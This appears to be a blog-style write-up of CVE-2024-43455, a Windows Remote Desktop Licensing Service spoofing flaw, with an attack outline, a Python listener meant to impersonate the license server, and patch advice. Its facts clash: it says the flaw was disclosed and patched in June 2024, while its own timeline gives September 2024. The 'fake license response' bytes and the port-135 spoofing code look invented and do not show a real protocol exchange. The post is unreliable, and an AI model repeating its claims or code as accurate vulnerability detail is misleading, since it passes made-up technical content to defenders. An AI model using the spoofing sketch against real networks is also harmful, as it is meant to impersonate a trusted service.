CVE-2024-43455 - Windows Remote Desktop Licensing Service Spoofing Vulnerability – Analysis, Code Example, and Exploit Details
In June 2024, Microsoft disclosed a security flaw affecting its Remote Desktop Licensing Service (also known as the License Server) under the identifier CVE-2024-43455. This vulnerability allows an attacker to spoof the Licensing Service in a Windows environment, with potentially severe consequences, especially in environments relying on Remote Desktop Services (RDS) for remote access.
In this post, you’ll find an easy-to-understand explanation of CVE-2024-43455, a demonstration of the problem with code snippets, an outline of exploit details, and recommendations on how to stay safe.
What is the Windows Remote Desktop Licensing Service?
The Remote Desktop Licensing Service helps manage and validate Remote Desktop client access licenses (RDS CALs). If attackers can trick systems into thinking they are a legitimate license server, they can weaken security measures, potentially allowing unauthorized users to access RDS infrastructure or perform further network attacks.
Component Affected: Remote Desktop Licensing Service
- Impact: An attacker on the network could impersonate a legitimate licensing server, letting them trick clients and other services.
CVSS Score: 7.6 (High)
- Patched In: June 2024 Patch Tuesday
What’s the problem?
The Licensing Service does not fully verify the authenticity of license requests and responses, meaning it can accept responses from an attacker pretending to be the real server. Specifically, the lack of robust cryptographic checks allows an attacker on the same network to send crafted responses to RDS clients or servers.
The attacker places themselves on the same network as the target (e.g., internal LAN or via VPN).
2. The attacker listens for traffic between RDS clients/servers and the Licensing Service on port TCP/445 or TCP/135.
3. When a new licensing request is broadcast, the attacker responds before the legitimate server, delivering fake responses that get trusted.
Example: Simulating the Attack
Here’s a simplified Python example showing how an attacker could listen and respond faster than the real licensing service. This is for educational purposes only.
import socket
# Spoof Licensing Server - listens for license requests and replies with a fake response
# Licensing service typically uses port 135 (DCOM) or 445 (SMB)
LISTEN_PORT = 135
LIC_SERVICE_IP = '...'
def start_spoof_server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((LIC_SERVICE_IP, LISTEN_PORT))
s.listen(5)
print(f"[*] Spoof Licensing Service running on port {LISTEN_PORT}...")
while True:
client_sock, addr = s.accept()
print(f"[+] Licensing request from {addr}")
# Here, we'd normally parse and see if this is really a licensing request.
# For demo purposes, send an always-successful response.
fake_license_response = b"\x01\x00\x00\x00" # Mimic a "licensed" response
client_sock.send(fake_license_response)
client_sock.close()
if __name__ == '__main__':
start_spoof_server()
RDS Security Bypass: Allowing unlicensed access via a spoof license server.
- Man-in-the-Middle (MitM): Setting up for future attacks (stealing credentials, session hijacking).
Trust Exploit: Faking audit logs, tracking, or compliance for licensed usage.
## How to Fix / Mitigate
Microsoft released a fix in June 2024 as part of their security updates. Apply all updates immediately.
References
- Microsoft Security Response Center: CVE-2024-43455
- June 2024 Patch Tuesday Release Notes
- Understanding RDS Licensing
Conclusion
CVE-2024-43455 is a reminder that even “background” services like licensing servers can introduce critical vulnerabilities. If you run Windows Remote Desktop Services, patch your systems now and tighten network security around your licensing infrastructure.
Always keep your systems up to date and audit your network regularly.
*If you found this post useful, let us know! Stay safe and secure!*
Timeline
Published on: 09/10/2024 17:15:32 UTC
Last modified on: 10/09/2024 01:26:37 UTC